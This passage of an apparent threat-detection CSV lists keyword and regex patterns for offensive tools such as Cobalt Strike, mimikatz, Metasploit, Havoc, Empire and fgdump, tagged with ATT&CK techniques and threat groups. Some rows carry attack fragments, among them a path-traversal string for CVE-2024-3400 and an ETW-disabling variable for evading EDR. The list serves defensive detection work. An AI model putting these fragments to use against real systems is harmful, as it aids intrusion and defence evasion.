Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58471" "*serverscan86 *",".{0,1000}serverscan86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58472" "*Server-Side-Request-Forgery-Payloads.*",".{0,1000}Server\-Side\-Request\-Forgery\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","58473" "*service rotateproxy *",".{0,1000}service\srotateproxy\s.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","58479" "*service/executable/",".{0,1000}service\/executable\/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","58483" "*service/executable/compile.exe*",".{0,1000}service\/executable\/compile\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","58484" "*service::preshutdown*",".{0,1000}service\:\:preshutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58485" "*service_permissions_escalate.rb*",".{0,1000}service_permissions_escalate\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58486" "*ServiceBase.Run(new MakeMeAdminService(*",".{0,1000}ServiceBase\.Run\(new\sMakeMeAdminService\(.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","58487" "*servicedigilogos@protonmail.com*",".{0,1000}servicedigilogos\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58488" "*ServiceHavoc.exe",".{0,1000}ServiceHavoc\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","58489" 
"*servicemove*hid.dll*",".{0,1000}servicemove.{0,1000}hid\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","58490" "*ServiceName = """"[C2ProfileService]*",".{0,1000}ServiceName\s\=\s\""\[C2ProfileService\].{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - 
agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","58491" "*ServiceName = ""MakeMeAdmin""*",".{0,1000}ServiceName\s\=\s\""MakeMeAdmin\"".{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","58492" "*serviceName = *""KrbSCM""",".{0,1000}serviceName\s\=\s.{0,1000}\""KrbSCM\""","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","58493" "*ServiceName*BadWindowsService*",".{0,1000}ServiceName.{0,1000}BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#servicename","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","58496" "*ServiceName*CorpVPN*",".{0,1000}ServiceName.{0,1000}CorpVPN.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - 
T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58497" "*ServiceName'>KrbSCM*",".{0,1000}ServiceName\'\>KrbSCM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","servicename","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","58499" "*services/p2p.Handle(): Wrote SMB fragment *",".{0,1000}services\/p2p\.Handle\(\)\:\sWrote\sSMB\sfragment\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58503" "*ServiceShell - PoC to create Service Logon process*",".{0,1000}ServiceShell\s\-\sPoC\sto\screate\sService\sLogon\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58504" "*ServiceShell - PoC to create Service Logon 
process*",".{0,1000}ServiceShell\s\-\sPoC\sto\screate\sService\sLogon\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58505" "*servpw.exe*",".{0,1000}servpw\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58507" "*servpw64.exe*",".{0,1000}servpw64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58508" "*SeSecurityPrivilegePoC.exe*",".{0,1000}SeSecurityPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58509" "*SeShutdownPrivilegePoC.exe*",".{0,1000}SeShutdownPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - 
TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58510" "*SESSID=../../../../*",".{0,1000}SESSID\=\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-3400 exploitation attempt","T1210.001 - T1068 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://x.com/HackingLZ/status/1780239802496864474","1","1","#linux","N/A","8","10","N/A","N/A","N/A","N/A","58511" "*SessionGopher.ps1*",".{0,1000}SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58512" "*SeSystemEnvironmentPrivilegePoC.exe*",".{0,1000}SeSystemEnvironmentPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58513" "*set * virus_scanner*",".{0,1000}set\s.{0,1000}\svirus_scanner.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58514" "*set AutoRunScript multi_console_command -rc /root/*.rc*",".{0,1000}set\sAutoRunScript\smulti_console_command\s\-rc\s\/root\/.{0,1000}\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","58516" "*set CertPath data/*",".{0,1000}set\sCertPath\sdata\/.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58517" "*set CollectionMethodAll*",".{0,1000}set\sCollectionMethodAll.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58518" "*set COMPlus_ETWEnabled=0*",".{0,1000}set\sCOMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58519" "*set encoder x86/shikata_ga_nai*",".{0,1000}set\sencoder\sx86\/shikata_ga_nai.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58520" "*set havoc *",".{0,1000}set\shavoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","58522" "*set hosts_stage*",".{0,1000}set\shosts_stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58524" "*set https_proxy=http://127.0.0.1:9999*",".{0,1000}set\shttps_proxy\=http\:\/\/127\.0\.0\.1\:9999.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - 